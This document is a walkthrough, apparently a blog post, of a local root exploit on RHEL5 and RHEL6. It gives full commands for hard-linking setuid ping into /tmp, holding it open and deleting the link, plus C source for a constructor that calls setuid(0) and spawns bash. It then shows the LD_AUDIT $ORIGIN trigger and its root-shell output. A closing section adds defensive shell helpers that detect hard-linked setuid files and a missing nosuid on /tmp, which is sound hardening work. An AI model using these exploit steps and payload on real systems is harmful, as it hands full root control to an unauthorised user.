Applies to: RHEL5 through RHEL6
This vulnerability abuses the special permission bit (setuid) on a file; the procedure is as follows.
First, log in to the system and create any directory under /tmp.
[test@linux-6-node-1 tmp]$ ll -d /tmp/
drwxrwxrwt. 6 root root 4096 Sep 24 20:06 /tmp/
[test@linux-6-node-1 tmp]$ mkdir exploit
[test@linux-6-node-1 tmp]$ ll -d exploit
drwxrwxr-x. 2 gl gl 4096 Sep 24 20:31 exploit
Hard-link a command file that carries the suid bit into the newly created directory.
[test@linux-6-node-1 tmp]$ ll /bin/ping
-rwsr-xr-x. 2 root root 38200 Jul 24 2015 /bin/ping
[test@linux-6-node-1 tmp]$ ln /bin/ping /tmp/exploit/target
[test@linux-6-node-1 tmp]$ ll !$
ll /bin/ping
-rwsr-xr-x. 2 root root 38200 Jul 24 2015 /bin/ping
Open the file so that it stays loaded in memory.
[test@linux-6-node-1 tmp]$ exec 3< /tmp/exploit/target
[test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3
lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target
Delete the linked file.
[test@linux-6-node-1 tmp]$ rm -fr /tmp/exploit/
[test@linux-6-node-1 tmp]$ ll /proc/$$/fd/3
lr-x------. 1 gl gl 64 Sep 24 20:17 /proc/44429/fd/3 -> /tmp/exploit/target (deleted)
Write a C program to escalate privileges.
[test@linux-6-node-1 tmp]$ vim payload.c
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid() */

/* constructor: runs as soon as the shared object is loaded */
void __attribute__((constructor)) init()
{
    setuid(0);
    system("/bin/bash");
}
Compile the program.
[test@linux-6-node-1 tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c
[test@linux-6-node-1 tmp]$ ll /tmp/exploit
-rwxrwxr-x. 1 gl gl 6020 Sep 24 20:25 /tmp/exploit
Run it to escalate privileges.
[test@linux-6-node-1 tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3
ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
            [-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
            [-M mtu discovery hint] [-S sndbuf]
            [ -T timestamp option ] [ -Q tos ] [hop1 ...] destination
[root@linux-6-node-1 ~]#
You can see that the prompt has changed from $ to #, and everyone knows what # means; confirm it with whoami.
[root@linux-6-node-1 ~]# whoami
root
Privilege escalation succeeded.
There is no need to worry too much about this: the precondition is that you must already be logged in to the server, and with routine security hygiene in place this situation can be avoided.
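As an added example (not part of the original post), the following shell audit helpers check the two preconditions the walkthrough above depends on: a setuid binary that has been hard-linked into another directory, and a /tmp filesystem mounted without nosuid. The function names and the optional mounts-table argument are this example's own; it assumes a Linux host with POSIX find and awk.

```shell
#!/bin/sh
# Added audit helpers for the hard-linked-setuid walkthrough above.

# Print every setuid regular file under $1 whose link count is above 1.
# A root-owned setuid binary with an extra hard link is exactly the state
# created by the "ln /bin/ping /tmp/exploit/target" step: a second path,
# in a directory the unprivileged user controls, pointing at the same inode.
suid_with_extra_links() {
    find "$1" -xdev -type f -perm -4000 -links +1 -print 2>/dev/null
}

# Print the mount options of the filesystem that contains path $1.
# $2 is the mounts table to read; it defaults to /proc/mounts, and a
# constructed table can be passed for offline testing.
mount_options_for() {
    path=$1
    table=${2:-/proc/mounts}
    awk -v p="$path" '
        # keep the options of the longest mount point that prefixes the path
        {
            mp = $2
            if (mp == "/" || p == mp || index(p, mp "/") == 1)
                if (length(mp) > best) { best = length(mp); opts = $4 }
        }
        END { print opts }' "$table"
}

# Exit 0 when the filesystem holding $1 is mounted nosuid, 1 otherwise.
# With nosuid on /tmp the kernel ignores the setuid bit on anything
# executed from there, including a hard link of /bin/ping.
mount_has_nosuid() {
    case ",$(mount_options_for "$1" "$2")," in
        *,nosuid,*) return 0 ;;
        *)          return 1 ;;
    esac
}

# Stand-alone usage: report linked setuid files under /tmp and /home,
# then say whether /tmp is protected by nosuid.
audit_host() {
    for d in /tmp /home; do
        [ -d "$d" ] && suid_with_extra_links "$d"
    done
    if mount_has_nosuid /tmp; then
        echo "/tmp: nosuid set"
    else
        echo "/tmp: WARNING nosuid not set"
    fi
}
```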